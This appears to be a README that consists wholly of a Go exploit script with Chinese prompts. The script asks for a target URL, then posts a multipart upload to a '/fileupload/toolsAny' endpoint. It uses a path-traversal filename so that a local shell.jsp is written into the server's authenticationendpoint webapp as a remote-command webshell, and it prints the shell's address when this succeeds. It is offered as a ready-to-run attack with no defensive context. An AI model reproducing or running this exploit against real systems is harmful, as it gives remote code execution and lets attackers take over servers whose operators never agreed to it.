README.md
Rendering markdown...
package main
import (
"bytes"
"crypto/tls"
"fmt"
"io"
"io/ioutil"
"mime/multipart"
"net/http"
"os"
"strings"
)
func main() {
var host string
fmt.Println("请输入目标地址, 如 https://127.0.0.1")
fmt.Scanf("%s ", &host)
exp(host)
}
func exp(host string) {
host = strings.TrimSuffix(host, "/")
bodyBuf := new(bytes.Buffer)
bodyWriter := multipart.NewWriter(bodyBuf)
fileWriter, _ := bodyWriter.CreateFormFile("../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp", "../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp")
shellfile, _ := os.Open("./shell.jsp")
defer shellfile.Close()
_, _ = io.Copy(fileWriter, shellfile)
contentType := bodyWriter.FormDataContentType()
bodyWriter.Close()
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}
client := &http.Client{Transport: tr}
url := host + "/fileupload/toolsAny"
req, _ := http.NewRequest("POST", url, nil)
req.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1")
req.Header.Set("Content-Type", contentType)
req.Body = ioutil.NopCloser(bodyBuf)
resp, _ := client.Do(req)
data, _ := ioutil.ReadAll(resp.Body)
defer resp.Body.Close()
if resp.StatusCode == 200 && string(data) != ""{
fmt.Printf("webshell写入成功, 地址: %v/authenticationendpoint/cmd.jsp\n", host)
} else {
fmt.Println("webshell写入失败")
fmt.Println(string(data))
}
}